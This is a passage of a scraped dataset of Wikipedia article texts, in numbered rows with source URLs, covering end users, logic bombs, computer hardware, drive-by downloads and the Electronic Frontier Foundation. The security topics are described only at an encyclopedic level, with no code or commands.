518 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/End-user_(computer_science) | In product development, an end user (sometimes end-user) a is a person who ultimately uses or is intended to ultimately use a product. 1 2 3 The end user stands in contrast to users who support or maintain the product, 4 such as sysops, system administrators, database administrators, 5 information technology (IT) experts, software professionals, and computer technicians. End users typically do not possess the technical understanding or skill of the product designers, 6 a fact easily overlooked and forgotten by designers: leading to features creating low customer satisfaction. 2 In information technology, end users are not customers in the usual sense—they are typically employees of the customer. 7 For example, if a large retail corporation buys a software package for its employees to use, even though the large retail corporation was the customer that purchased the software, the end users are the employees of the company, who will use the software at work. End users are one of the three major factors contributing to the complexity of managing information systems. The end user's position has changed from a position in the 1950s (where end users did not interact with the mainframe; computer experts programmed and ran the mainframe) to one in the 2010s where the end user collaborates with and advises the management information system and Information Technology department about his or her needs regarding the system or product. This raises new questions, such as: Who manages each resource?, What is the role of the MIS Department? and What is the optimal relationship between the end-user and the MIS Department? 8 The concept of end-user first surfaced in the late 1980s and has since then raised many debates. One challenge was the goal to give both the user more freedom, by adding advanced features and functions (for more advanced users) and adding more constraints (to prevent a neophyte user from accidentally erasing an entire company's database). 9 This phenomenon appeared as a consequence of consumerization of computer products and software. In the 1960s and 1970s, computer users were generally programming experts and computer scientists. However, in the 1980s, and especially in the mid-to-late 1990s and the early 2000s, everyday, regular people began using computer devices and software for personal and work use. IT specialists needed to cope with this trend in various ways. In the 2010s, users now want to have more control over the systems they operate, to solve their own problems, and be able to customize the systems to suit their needs. The apparent drawbacks were the risk of corruption of the systems and data the users had control of, due to their lack of knowledge on how to properly operate the computer software at an advanced level. 10 For companies to appeal to the user, it took primary care to accommodate and think of end-users in their new products, software launches, and updates. A partnership needed to be formed between the programmer-developers and the everyday end users so both parties could maximize the use of the products effectively. 11 A major example of the public's effects on end user's requirements were the public libraries. They have been affected by new technologies in many ways, ranging from the digitalization of their card catalog, the shift to e-books, e-journals, and offering online services. Libraries have had to undergo many changes in order to cope, 12 including training existing librarians in Web 2.0 and database skills, to hiring IT and software experts. The aim of end user documentation (e.g., manuals and guidebooks for products) is to help the user understand certain aspects of the systems and to provide all the answers in one place. 13 A lot of documentation is available for users to help them understand and properly use a certain product or service. Due to the fact that the information available is usually very vast, inconsistent or ambiguous (e.g., a user manual with hundreds of pages, including guidance on using advanced features), many users suffer from an information overload. Therefore, they become unable to take the right course of action. This needs to be kept in mind when developing products and services and the necessary documentation for them. 14 Well-written documentation is needed for a user to reference. Some key aspects of such a documentation are: 13 At times users do not refer to the documentation available to them due to various reasons, ranging from finding the manual too large or due to not understanding the jargon and acronyms it contains. In other cases, the users may find that the manual makes too many assumptions about a user having pre-existing knowledge of computers and software, and thus the directions may skip over these initial steps (from the users' point of view). Thus, frustrated user may report false problems because of their inability to understand the software or computer hardware. This in turn causes the company to focus on perceived problems instead of focusing on the actual problems of the software. 15 In the 2010s, there is a lot of emphasis on user's security and privacy. With the increasing role that computers are playing in people's lives, people are carrying laptops and smartphones with them and using them for scheduling appointments, making online purchases using credit cards and searching for information. These activities can potentially be observed by companies, governments or individuals, which can lead to breaches of privacy, identity theft, by, blackmailing and other serious concerns. As well, many businesses, ranging from small business startups to huge corporations are using computers and software to design, manufacture, market and sell their products and services, and businesses also use computers and software in their back office processes (e.g., human resources, payroll, etc.). As such, it is important for people and organizations to need know that the information and data they are storing, using, or sending over computer networks or storing on computer systems is secure. However, developers of software and hardware are faced with many challenges in developing a system that can be both user friendly, accessible 24 7 on almost any device and be truly secure. Security leaks happen, even to individuals and organizations that have security measures in place to protect their data and information (e.g., firewalls, encryption, strong passwords). The complexities of creating such a secure system come from the fact that the behaviour of humans is not always rational or predictable. Even in a very-well secured computer system, a malicious individual can telephone a worker and pretend to be a private investigator working for the software company, and ask for the individual's password, a dishonest process called phishing. As well, even with a well-secured system, if a worker decides to put the company's electronic files on a USB drive to take them home to work on them over the weekend (against many companies' policies), and then loses this USB drive, the company's data may be compromised. Therefore, developers need to make systems that are intuitive to the user in order to have information security and system security. 16 Another key step to end user security is informing the people and employees about the security threats and what they can do to avoid them or protect themselves and the organization. Clearly underlining, the capabilities and risks makes users more aware and informed whilst they are using the products. Some situations that could put the user at risk are: Even if the security measures in place are strong, the choices the user makes and his her behavior have a major impact on how secure their information really is. Therefore, an informed user is one who can protect and achieve the best security out of the system they use. 17 Because of the importance of end-user security and the impact it can have on organizations the UK government set out a guidance for the public sector, to help civil servants learn how to be more security aware when using government networks and computers. While this is targeted to a certain sector, this type of educational effort can be informative to any type of user. This helps developers meet security norms and end users be aware of the risks involved. 18 Reimers and Andersson have conducted a number of studies on end-user security habits and found that the same type of repeated education training in security best practices can have a marked effect on the perception of compliance with good end-user network security habits, especially concerning malware and ransomware. 19 In end-user license agreements, the end user is distinguished from the value-added reseller, who installs the software or the organization that purchases and manages the software. 20 failed verification Certain American defense-related products and information require export approval from the United States Government under the International Traffic in Arms Regulations and Export Administration Regulations. 21 In order to obtain a license to export, the exporter must specify both the end user and the end use for undertaking an end-user certificate. 22 In the UK, there exist documents that accompany licenses for products named in the end user undertaking statements. clarification needed 23 |
519 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Logic_bomb | A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files (such as a salary database trigger), should they ever be terminated from the company. Software that is inherently malicious, such as viruses and worms, often contain logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. This technique can be used by a virus or worm to gain momentum and spread before being noticed. Some viruses attack their host systems on specific dates, such as Friday the 13th or April Fools' Day. Trojans and other computer viruses that activate on certain dates are often called "time bombs". To be considered a logic bomb, the payload should be unwanted and unknown to the user of the software. As an example, trial programs with code that disables certain functionality after a set time are not normally regarded as logic bombs. Thomas C. Reed wrote in his 2004 book At the Abyss: An Insider's History of the Cold War that in 1982, a sabotage occurred on the Trans-Siberian Pipeline because of a logic bomb. According to Reed, a KGB operative stole the plans for a sophisticated control system and its software from a Canadian firm, for use on its Siberian pipeline. The Central Intelligence Agency (CIA) was tipped off by documents in the Farewell Dossier, and had the company insert a logic bomb in the program for sabotage purposes. 20 21 Critics have contested the authenticity of this account, 22 23 and it was reported that the story may be a hoax. 24 |
520 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_hardware | Computer hardware includes the physical parts of a computer, such as the central processing unit (CPU), random access memory (RAM), motherboard, computer data storage, graphics card, sound card, and computer case. It includes external devices such as a monitor, mouse, keyboard, and speakers. 1 2 By contrast, software is the set of instructions that can be stored and run by hardware. Hardware is so-termed because it is hard or rigid with respect to changes, whereas software is soft because it is easy to change. Hardware is typically directed by the software to execute any command or instruction. A combination of hardware and software forms a usable computing system, although other systems exist with only hardware. Early computing devices more complicated than the ancient abacus date to the seventeenth century. French mathematician Blaise Pascal designed a gear-based device that could add and subtract, selling around 50 models. The stepped reckoner was invented by Gottfried Leibniz by 1676, which could also divide and multiply. Due to the limitations of contemporary fabrication and design flaws, Leibniz' reckoner was not very functional, but similar devices (Leibniz wheel) remained in use into the 1970s. 3 In the 19th century, Englishman Charles Babbage invented the difference engine, a mechanical device to calculate polynomials for astronomical purposes. 4 Babbage also designed a general-purpose computer that was never built. Much of the design was incorporated into the earliest computers: punch cards for input and output, memory, an arithmetic unit analogous to central processing units, and even a primitive programming language similar to assembly language. 5 In 1936, Alan Turing developed the universal Turing machine to model any type of computer, proving that no computer would be able to solve the decision problem. 6 The universal Turing machine was a type of stored-program computer capable of mimicking the operations of any Turing machine (computer model) based on the software instructions passed to it. The storage of computer programs is key to the operation of modern computers and is the connection between computer hardware and software. 7 Even prior to this, in the mid 19th century mathematician George Boole invented Boolean algebra—a system of logic where each proposition is either true or false. Boolean algebra is now the basis of the circuits that model the transistors and other components of integrated circuits that make up modern computer hardware. 8 In 1945, Turing finished the design for a computer (the Automatic Computing Engine) that was never built. 9 Around this time, technological advancement in relays and vacuum tubes enabled the construction of the first computers. 10 Building on Babbage's design, relay computers were built by George Stibitz at Bell Laboratories and Harvard University's Howard Aiken, who engineered the MARK I. 5 Also in 1945, mathematician John von Neumann—working on the ENIAC project at the University of Pennsylvania—devised the underlying von Neumann architecture that has served as the template for most modern computers. 11 Von Neumann's design featured a centralized memory that stored both data and programs, a central processing unit (CPU) with priority of access to the memory, and input and output (I O) units. Von Neumann used a single bus to transfer data, meaning that his solution to the storage problem by locating programs and data adjacent to each other created the Von Neumann bottleneck when the system tries to fetch both at the same time—often throttling the system's performance. 12 Computer architecture requires prioritizing between different goals, such as cost, speed, availability, and energy efficiency. The designer must have a good grasp of the hardware requirements and many different aspects of computing, from compilers to integrated circuit design. 14 Cost has also become a significant constraint for manufacturers seeking to sell their products for less money than competitors offering a very similar commodity. Profit margins have also been reduced. 15 Even when the performance is not increasing, the cost of components has been dropping over time due to improved manufacturing techniques that have fewer components rejected at quality assurance stage. 16 The most common instruction set architecture (ISA)—the interface between a computer's hardware and software—is based on the one devised by von Neumann in 1945. 17 Despite the separation of the computing unit and the I O system in many diagrams, typically the hardware is shared, with a bit in the computing unit indicating whether it is in computation or I O mode. 18 Common types of ISAs include CISC (complex instruction set computer), RISC (reduced instruction set computer), vector operations, and hybrid modes. 19 CISC involves using a larger expression set to minimize the number of instructions the machines need to use. 20 Based on a recognition that only a few instructions are commonly used, RISC shrinks the instruction set for added simplicity, which also enables the inclusion of more registers. 21 After the invention of RISC in the 1980s, RISC based architectures that used pipelining and caching to increase performance displaced CISC architectures, particularly in applications with restrictions on power usage or space (such as mobile phones). From 1986 to 2003, the annual rate of improvement in hardware performance exceeded 50 percent, enabling the development of new computing devices such as tablets and mobiles. 22 Alongside the density of transistors, DRAM memory as well as flash and magnetic disk storage also became exponentially more compact and cheaper. The rate of improvement slackened off in the twenty-first century. 23 In the twenty-first century, increases in performance have been driven by increasing exploitation of parallelism. 24 Applications are often parallelizable in two ways: either the same function is running across multiple areas of data (data parallelism) or different tasks can be performed simultaneously with limited interaction (task parallelism). 25 These forms of parallelism are accommodated by various hardware strategies, including instruction-level parallelism (such as instruction pipelining), vector architectures and graphical processing units (GPUs) that are able to implement data parallelism, thread-level parallelism and request-level parallelism (both implementing task-level parallelism). 25 Microarchitecture, also known as computer organization, refers to high-level hardware questions such as the design of the CPU, memory, and memory interconnect. 26 Memory hierarchy ensures that the memory quicker to access (and more expensive) is located closer to the CPU, while slower, cheaper memory for large-volume storage is located further away. 27 Memory is typically segregated to separate programs from data and limit an attacker's ability to alter programs. 28 Most computers use virtual memory to simplify addressing for programs, using the operating system to map virtual memory to different areas of the finite physical memory. 29 Computer processors generate heat, and excessive heat impacts their performance and can harm the components. Many computer chips will automatically throttle their performance to avoid overheating. Computers also typically have mechanisms for dissipating excessive heat, such as air or liquid coolers for the CPU and GPU and heatsinks for other components, such as the RAM. Computer cases are also often ventilated to help dissipate heat from the computer. 30 Data centers typically use more sophisticated cooling solutions to keep the operating temperature of the entire center safe. Air-cooled systems are more common in smaller or older data centers, while liquid-cooled immersion (where each computer is surrounded by cooling fluid) and direct-to-chip (where the cooling fluid is directed to each computer chip) can be more expensive but are also more efficient. 31 Most computers are designed to be more powerful than their cooling system, but their sustained operations cannot exceed the capacity of the cooling system. 32 While performance can be temporarily increased when the computer is not hot (overclocking), 33 in order to protect the hardware from excessive heat, the system will automatically reduce performance or shut down the processor if necessary. 32 Processors also will shut off or enter a low power mode when inactive to reduce heat. 34 Power delivery as well as heat dissipation are the most challenging aspects of hardware design, 35 and have been the limiting factor to the development of smaller and faster chips since the early twenty-first century. 34 Increases in performance require a commensurate increase in energy use and cooling demand. 36 The personal computer is one of the most common types of computer due to its versatility and relatively low price. Virtual hardware is software that mimics the function of hardware; it is commonly used in infrastructure as a Service (IaaS) and platform as a Service (PaaS). 45 Embedded systems have the most variation in their processing power and cost: from an 8 bit processor that could cost less than USD$0.10, to higher-end processors capable of billions of operations per second and costing over USD$100. Cost is a particular concern with these systems, with designers often choosing the cheapest option that satisfies the performance requirements. 46 A computer case encloses most of the components of a desktop computer system. It provides mechanical support and protection for internal elements such as the motherboard, disk drives, and power supply, and controls and directs the flow of cooling air over internal components. The case is also part of the system to control electromagnetic interference radiated by the computer and protects internal parts from electrostatic discharge. Large tower cases provide space for multiple disk drives or other peripherals and usually stand on the floor, while desktop cases provide less expansion room. All-in-one style designs include a video display built into the same case. Portable and laptop computers require cases that provide impact protection for the unit. Hobbyists may decorate the cases with colored lights, paint, or other features, in an activity called case modding. Most personal computer power supply units meet the ATX standard and convert from alternating current (AC) at between 120 and 277 volts provided from a power outlet to direct current (DC) at a much lower voltage: typically 12, 5, or 3.3 volts. 47 The motherboard is the main component of a computer. It is a board with integrated circuitry that connects the other parts of the computer including the CPU, the RAM, the disk drives (CD, DVD, hard disk, or any others) as well as any peripherals connected via the ports or the expansion slots. The integrated circuit (IC) chips in a computer typically contain billions of tiny metal oxide semiconductor field-effect transistors (MOSFETs). 48 Components directly attached to or to part of the motherboard include: An expansion card in computing is a printed circuit board that can be inserted into an expansion slot of a computer motherboard or backplane to add functionality to a computer system via the expansion bus. Expansion cards can be used to obtain or expand on features not offered by the motherboard. citation needed Using expansion cards for a video processor used to be common, but modern computers are more likely to instead have a GPU integrated into the motherboard. 61 Most computers also have an external data bus to connect peripheral devices to the motherboard. Most commonly, Universal Serial Bus (USB) is used. 62 Unlike the internal bus, the external bus is connected using a bus controller that allows the peripheral system to operate at a different speed from the CPU. 62 Input and output devices are used to receive data from the external world or write data respectively. Common examples include keyboards and mice (input) and displays and printers (output). Network interface controllers are used to access the Internet. 63 USB ports also allow power to connected devices—a standard USB supplies power at 5 volts and up to 500 milliamps (2.5 watts), while powered USB ports with additional pins may allow the delivery of more power—up to 6 amps at 24v. 64 Global revenue from computer hardware in 2023 reached $705.17 billion. 65 Because computer parts contain hazardous materials, there is a growing movement to recycle old and outdated parts. 66 Computer hardware contain dangerous chemicals such as lead, mercury, nickel, and cadmium. According to the EPA these e-wastes have a harmful effect on the environment unless they are disposed of properly. Making hardware requires energy, and recycling parts will reduce air pollution, water pollution, as well as greenhouse gas emissions. 67 Disposing unauthorized computer equipment is in fact illegal. Legislation makes it mandatory to recycle computers through the government approved facilities. Recycling a computer can be made easier by taking out certain reusable parts. For example, the RAM, DVD drive, the graphics card, hard drive or SSD, and other similar removable parts can be reused. Many materials used in computer hardware can be recovered by recycling for use in future production. Reuse of tin, silicon, iron, aluminum, and a variety of plastics that are present in bulk in computers or other electronics can reduce the costs of constructing new systems. Components frequently contain copper, gold, tantalum, 68 69 silver, platinum, palladium, and lead as well as other valuable materials suitable for reclamation. 70 71 The central processing unit contains many toxic materials. It contains lead and chromium in the metal plates. Resistors, semiconductors, infrared detectors, stabilizers, cables, and wires contain cadmium. The circuit boards in a computer contain mercury, and chromium. 72 When these types of materials, and chemicals are disposed improperly will become hazardous for the environment. When e-waste byproducts leach into groundwater, are burned, or get mishandled during recycling, it causes harm. Health problems associated with such toxins include impaired mental development, cancer, and damage to the lungs, liver, and kidneys. 73 Computer components contain many toxic substances, like dioxins, polychlorinated biphenyls (PCBs), cadmium, chromium, radioactive isotopes and mercury. Circuit boards contain considerable quantities of lead-tin solders that are more likely to leach into groundwater or create air pollution due to incineration. 74 Recycling of computer hardware is considered environmentally friendly because it prevents hazardous waste, including heavy metals and carcinogens, from entering the atmosphere, landfill or waterways. While electronics consist a small fraction of total waste generated, they are far more dangerous. There is stringent legislation designed to enforce and encourage the sustainable disposal of appliances, the most notable being the Waste Electrical and Electronic Equipment Directive of the European Union and the United States National Computer Recycling Act. 75 "E-cycling", the recycling of computer hardware, refers to the donation, reuse, shredding and general collection of used electronics. Generically, the term refers to the process of collecting, brokering, disassembling, repairing and recycling the components or metals contained in used or discarded electronic equipment, otherwise known as electronic waste (e-waste). "E-cyclable" items include, but are not limited to: televisions, computers, microwave ovens, vacuum cleaners, telephones and cellular phones, stereos, and VCRs and DVDs just about anything that has a cord, light or takes some kind of battery. 76 Some companies, such as Dell and Apple, will recycle computers of their make or any other make. Otherwise, a computer can be donated to Computer Aid International which is an organization that recycles and refurbishes old computers for hospitals, schools, universities, etc. 77 |
521 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Drive-by_download | In computer security, a drive-by download is the unintended download of software, typically malicious software. The term "drive-by download" usually refers to a download which was authorized by a user without understanding what is being downloaded, such as in the case of a Trojan horse. In other cases, the term may simply refer to a download which occurs without a user's knowledge. Common types of files distributed in drive-by download attacks include computer viruses, spyware, or crimeware. Drive-by downloads may happen when visiting a website, 1 opening an e-mail attachment or clicking a link, or clicking on a deceptive pop-up window: 2 by clicking on the window in the mistaken belief that, for example, an error report from the computer's operating system itself is being acknowledged or a seemingly innocuous advertisement pop-up is being dismissed. In such cases, the "supplier" may claim that the user "consented" to the download, although the user was in fact unaware of having started an unwanted or malicious software download. Similarly if a person is visiting a site with malicious content, the person may become victim to a drive-by download attack. That is, the malicious content may be able to exploit vulnerabilities in the browser or plugins to run malicious code without the user's knowledge. 3 A drive-by install (or installation) is a similar event. It refers to installation rather than download (though sometimes the two terms are used interchangeably). When creating a drive-by download, an attacker must first create their malicious content to perform the attack. With the rise in exploit packs that contain the vulnerabilities needed to carry out unauthorized drive-by download attacks, the skill level needed to perform this attack has been reduced. 3 The next step is to host the malicious content that the attacker wishes to distribute. One option is for the attacker to host the malicious content on their own server. However, because of the difficulty in directing users to a new page, it may also be hosted on a compromised legitimate website, or a legitimate website unknowingly distributing the attackers content through a third party service (e.g. an advertisement). When the content is loaded by the client, the attacker will analyze the fingerprint of the client in order to tailor the code to exploit vulnerabilities specific to that client. 4 Finally, the attacker exploits the necessary vulnerabilities to launch the drive-by download attack. Drive-by downloads usually use one of two strategies. The first strategy is exploiting API calls for various plugins. For example, the DownloadAndInstall API of the Sina ActiveX component did not properly check its parameters and allowed the downloading and execution of arbitrary files from the internet. The second strategy involves writing shellcode to memory, and then exploiting vulnerabilities in the web browser or plugin to divert the control flow of the program to the shell code. 4 After the shellcode has been executed, the attacker can perform further malicious activities. This often involves downloading and installing malware, but can be anything, including stealing information to send back to the attacker. 3 The attacker may also take measures to prevent detection throughout the attack. One method is to rely on the obfuscation of the malicious code. This can be done through the use of iframes. 3 Another method is to encrypt the malicious code to prevent detection. Generally the attacker encrypts the malicious code into a ciphertext, then includes the decryption method after the ciphertext. 4 Detection of drive-by download attacks is an active area of research. Some methods of detection involve anomaly detection, which tracks for state changes on a user's computer system while the user visits a webpage. This involves monitoring the user's computer system for anomalous changes when a web page is rendered. Other methods of detection include detecting when malicious code (shellcode) is written to memory by an attacker's exploit. Another detection method is to make run-time environments that allow JavaScript code to run and track its behavior while it runs. Other detection methods include examining contents of HTML pages to identify features that can be used to identify malicious web pages, and using characteristics of web servers to determine if a page is malicious. 3 Some antivirus tools use static signatures to match patterns of malicious scripts, although these are not very effective because of obfuscation techniques. Detection is also possible by using low-interaction or high-interaction honeyclients. 4 Drive-by downloads can also be prevented from occurring by using script-blockers such as NoScript, which can easily be added into browsers such as Firefox. Using such a script-blocker, the user can disable all the scripts on a given webpage, and then selectively re-enable individual scripts on a one-by-one basis in order to determine which ones are truly necessary for webpage functionality. However, some script-blocking tools can have unintended consequences, such as breaking parts of other websites, which can be a bit of a balancing act. 5 A different form of prevention, known as "Cujo, is integrated into a web proxy, where it inspects web pages and blocks the delivery of malicious JavaScript code. 6 |
522 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Electronic_Frontier_Foundation | The Electronic Frontier Foundation (EFF) is an international non-profit digital rights group based in San Francisco, California. It was founded in 1990 to promote Internet civil liberties. It provides funds for legal defense in court, presents amicus curiae briefs, defends individuals and new technologies from what it considers abusive legal threats, works to expose government malfeasance, provides guidance to the government and courts, organizes political action and mass mailings, supports some new technologies which it believes preserve personal freedoms and online civil liberties, maintains a database and web sites of related news and information, monitors and challenges potential legislation that it believes would infringe on personal liberties and fair use, and solicits a list of what it considers are abusive patents with intentions to defeat those that it considers are without merit. The Electronic Frontier Foundation was formed in July 1990 by John Gilmore, John Perry Barlow and Mitch Kapor in response to a series of actions by law enforcement agencies that led them to conclude that the authorities were gravely uninformed about emerging forms of online communication, 1 unreliable source? and that there was a need for increased protection for Internet civil liberties. In April 1990, Barlow had been visited by a U.S. Federal Bureau of Investigation agent in relation to the theft and distribution of the source code for a series of Macintosh ROMs. Barlow described the visit as "complicated by the agent's fairly complete unfamiliarity with computer technology. I realized right away that before I could demonstrate my innocence, I would first have to explain to him what guilt might be. Barlow felt that his experience was symptomatic of a "great paroxysm of governmental confusion during which everyone's liberties would become at risk". 2 non-primary source needed Barlow posted an account of this experience to The WELL online community and was contacted by Mitch Kapor, who had had a similar experience. The pair agreed that there was a need to defend civil liberties on the Internet. Kapor agreed to fund any legal fees associated with such a defense and the pair contacted New York lawyers Rabinowitz, Boudin, Standard, Krinsky and Lieberman about defending several computer hackers from a Harper's magazine forum on computers and freedom who had been the target of Secret Service raids. 1 unreliable source? This generated a large amount of publicity which led to offers of financial support from John Gilmore and Steve Wozniak. Barlow and Kapor continued to research conflicts between the government and technology and in June 1990, Barlow posted online the influential article entitled "Crime Puzzlement" in which Barlow announced his and Kapor's plans to create an organization to "raise and disburse funds for education, lobbying, and litigation in the areas relating to digital speech and the extension of the Constitution into Cyberspace. 3 non-primary source needed This generated further reaction and support for the ideas of Barlow and Kapor. In late June, Barlow held a series of dinners in San Francisco with major figures in the computer industry to develop a coherent response to these perceived threats. Barlow considered that: "The actions of the FBI and Secret Service were symptoms of a growing social crisis: Future Shock. America was entering the Information Age with neither laws nor metaphors for the appropriate protection and conveyance of information itself. 4 non-primary source needed Barlow felt that to confront this a formal organization would be needed; he hired Cathy Cook as press coordinator, and began to set up what would become the Electronic Frontier Foundation. The Electronic Frontier Foundation was formally founded on July 10, 1990, by Kapor and Barlow, who very soon after elected Gilmore, Wozniak, and Stewart Brand to join them on the board of directors. 4 non-primary source needed Initial funding was provided by Kapor, Wozniak, and an anonymous benefactor. 5 non-primary source needed 6 unreliable source? In 1990, Mike Godwin joined the organization as its first staff counsel. Then in 1991, Esther Dyson and Jerry Berman joined the EFF board of directors. By 1992, Cliff Figallo became the director of the original office, and in December 1992, Jerry Berman became the acting executive director of the organization as a whole, based in a new second office. citation needed The creation of the organization was motivated by the massive search and seizure on Steve Jackson Games executed by the United States Secret Service early in 1990. Similar but officially unconnected law-enforcement raids were being conducted across the United States at about that time as part of a state federal task force called Operation Sundevil. GURPS Cyberpunk, one of the game company's projects, was mistakenly labeled as a handbook for computer crime, 7 non-primary source needed and the Secret Service raided the offices of Steve Jackson Games. The search warrant for the raid was deemed hastily issued, and the games company soon after claimed unauthorized access as well as tampering of their emails. While phone calls were protected by legislation, digital emails were an early concept and had not been considered to fall under the right to personal privacy. The Steve Jackson Games case was the EFF's first high-profile case, was the major rallying point around which the EFF began promoting computer- and Internet-related civil liberties. 8 failed verification The EFF's second big case was Bernstein v. United States led by Cindy Cohn, in which programmer and professor Daniel J. Bernstein sued the government for permission to publish his encryption software, Snuffle, and a paper describing it. More recently, the organization has been involved in defending Edward Felten, Jon Lech Johansen and Dmitry Sklyarov. 9 non-primary source needed The organization was originally located at Mitch Kapor's Kapor Enterprises offices in Boston. 10 By the fall of 1993, the main EFF offices were consolidated into a single office in Washington DC, 10 headed by Executive Director Jerry Berman. During this time, some of the EFF's attention focused on influencing national policy, 10 to the dislike of some of the members of the organization. 10 11 In 1994, Berman parted ways with the EFF and formed the Center for Democracy and Technology, 10 while Drew Taubman briefly took the reins as executive director. In 1995, under the auspices of Executive Director Lori Fena, after some downsizing and in an effort to regroup and refocus on their base of support, the organization moved offices to San Francisco, California. 10 11 There, it took up temporary residence at John Gilmore's Toad Hall, and soon afterward moved into the Hamm's Building at 1550 Bryant St. After Fena moved onto the EFF board of directors for a while, the organization was led briefly by Tara Lemmey, followed by Barry Steinhardt (who had come from the closely allied Technology and Liberty Program at the American Civil Liberties Union (ACLU), and eventually returned to the ACLU). Not long before EFF's move into new offices at 454 Shotwell St. in SF's Mission District, Mike Godwin departed, long-time Legal Director Shari Steele was appointed executive director, and staff attorney Cindy Cohn became the legal director. In the spring of 2006, the EFF announced the opening of an office again in Washington, D.C., with two new staff attorneys. 12 In 2012, the EFF began a fundraising campaign for the renovation of a building located at 815 Eddy Street in San Francisco, to serve as its new headquarters. 13 non-primary source needed The move was completed in April 2013. 14 non-primary source needed On April 1, 2015, Shari Steele stepped down as executive director. 15 non-primary source needed Cindy Cohn became the new executive director, Corynne McSherry became the legal director, and Kurt Opsahl became the general counsel. By the mid 1990s the EFF was becoming seriously concerned about the refusal of the US government to license any secure encryption product for export unless it utilized key recovery and claims that governments could not decrypt information when protected by Data Encryption Standard (DES), continuing even after the public breaking of the code in the first of the DES Challenges. They coordinated and supported the construction of the EFF DES cracker (nicknamed Deep Crack), using special purpose hardware and software and costing $210,000. 16 17 non-primary source needed This brought the record for breaking a message down to 56 hours on 17 July 1998 and to under 24 hours on 19 January 1999 (in conjunction with distributed.net). The EFF published the plans and source code for the cracker. 18 Within four years the Advanced Encryption Standard was standardized as a replacement for DES. 19 The EFF is a leading supporter of the Email Privacy Act. 20 non-primary source needed The EFF regularly brings and defends lawsuits at all levels of the US legal system in pursuit of its goals and objectives. The EFF has long taken a stance against strategic lawsuits against public participation (SLAPP) as attempts to stymie free speech and advocated for effective anti-SLAPP legislation. 21 failed verification 22 non-primary source needed Many of the most significant technology law cases have involved the EFF, including MGM Studios, Inc. v. Grokster, Ltd., Apple v. Does, and others. non-primary source needed The Patent Busting Project is an Electronic Frontier Foundation (EFF) initiative challenging patents that the organization describes as illegitimate and suppress innovation or limit online expression. The initiative launched on April 19, 2004, and involves two phases: documenting the damage caused by these patents, and submitting challenges to the United States Patent and Trademark Office. 23 The EFF has long been an advocate of paper audit trails for voting machines and testified in support of them after the 2004 United States presidential election. 24 Later, it funded the research of Hariprasad Vemuru who exposed vulnerabilities in a particular model. 25 Since 2008, the EFF has operated the Our Vote Live website and database. Staffed by hotline volunteers, it is designed to quickly document irregularities and instances of voter suppression as they occur on an election day. 26 The EFF was active in the 2016 United States presidential election because of online phishing related to the controversy over fabrication of election results. J. Alex Halderman, a computer security professor at the University of Michigan, wrote an article that was published in Medium in 2016 stating he thought it was advisable to have a recount on some of the election results from states like Wisconsin, Michigan, and Pennsylvania, exclusively states Hillary Clinton lost. 27 In retaliation against Halderman, a hacker sent anti-Semitic and racist emails to students at University of Michigan signed from Halderman. The EFF publicizes these controversies and promotes the reduction of online phishing. 28 non-primary source needed In the spring of 2018, the EFF joined the Open Technology Institute (OTI), the Center for Democracy Technology, the ACLU Foundation of Northern California and four academics in writing The Santa Clara Principles: On Transparency and Accountability in Content Moderation. The document sets out the following guidelines for social networks. 29 Six months later, the same organizations sought the support of roughly 80 others, including Article 19, in calling for Facebook to adopt the Santa Clara Principles. 30 This was later updated with a request for Facebook to warn users who have interacted with sock puppet law enforcement accounts. 31 In 2019, the EFF and OTI delivered testimony about the Online Harms White Paper in the United Kingdom. They commented that several proposals to increase the amount of regulation on social media were open to abuse. 32 Also in 2019, the EFF launched the website "TOSsed out" to document cases of moderation rules being applied inconsistently. 33 unreliable source? Cindy Cohn underscored their commitment to upholding free speech online, writing that "once you've turned it on, whether through pressure or threats of lawsuits, the power to silence people doesn't just go in one direction. 34 In December 2022, the EFF and 56 other digital advocacy organizations called for internet infrastructure providers to stop policing the content of the websites they service. 35 non-primary source needed The organizations argued that many providers can only moderate content by revoking access to an entire website, leaving end-users with little transparency or recourse. They expressed concern that governments may pressure infrastructure providers to deny service to opponents and marginalized groups, and that monopolistic infrastructure providers may take banned users offline altogether. The coalition believes that platforms and user-facing websites are better-positioned as moderators, because they can remove specific content, sanction accounts granularly, and offer reasoning and appeals for moderation decisions. 36 non-primary source needed 37 The initiative was launched in the wake of Drop Kiwi Farms, a campaign that convinced several internet service providers and DDoS protection firms to revoke service to Kiwi Farms, a controversial forum. 38 non-primary source needed After the forum returned behind an open-source bot detection tool, the EFF stopped classifying DDoS protection services as infrastructure because they cannot determine whether a website stays online or not. 39 non-primary source needed The EFF organizes two sets of awards to promote work in accordance with its goals and objectives. The EFF Awards, until 2022 called the EFF Pioneer Awards, are awarded annually to recognize individuals who in its opinion are "leaders who are extending freedom and innovation on the electronic frontier. 40 In 2017, the honorees were Chelsea Manning, Mike Masnick and Annie Game. 41 The EFF Cooperative Computing Awards are a series of four awards meant "to encourage ordinary Internet users to contribute to solving huge scientific problems", to be awarded to the first individual or group who discovers a prime number with a significant record number of decimal digits. The awards are funded by an anonymous donor. 42 The awards are: EFF publishes through several outlets such as the online periodical EFFector, 45 as well as its websites, blogs, and on social networking services. non-primary source needed EFF's first book was published in 1993 as The Big Dummy's Guide to the Internet, a beginners' how-to manual by contracted technical writer Adam Gaffin, and made available for free download in many formats. MIT Press published it in paperback form in 1994 as Everybody's Guide to the Internet (ISBN 9780262571050). The online edition was updated regularly throughout the 1990s and early 2000s, and translated into dozens of languages. non-primary source needed The organization's second book, Protecting Yourself Online (ISBN 9780062515124), an overview of digital civil liberties, was written in 1998 by technical writer Robert B. Gelman and EFF Communications Director Stanton McCandlish, and published by HarperCollins. non-primary source needed A third book, Cracking DES: Secrets of Encryption Research, Wiretap Politics Chip Design (ISBN 9781565925205), focusing on EFF's DES Cracker project, was published the same year by O'Reilly Media. non-primary source needed A digital book, Pwning Tomorrow, an anthology of speculative fiction, was produced in 2015 as part of EFF's 25th anniversary activities, and includes contributions from 22 writers, including Charlie Jane Anders, Paolo Bacigalupi, Lauren Beukes, David Brin, Pat Cadigan, Cory Doctorow, Neil Gaiman, Eileen Gunn, Kameron Hurley, 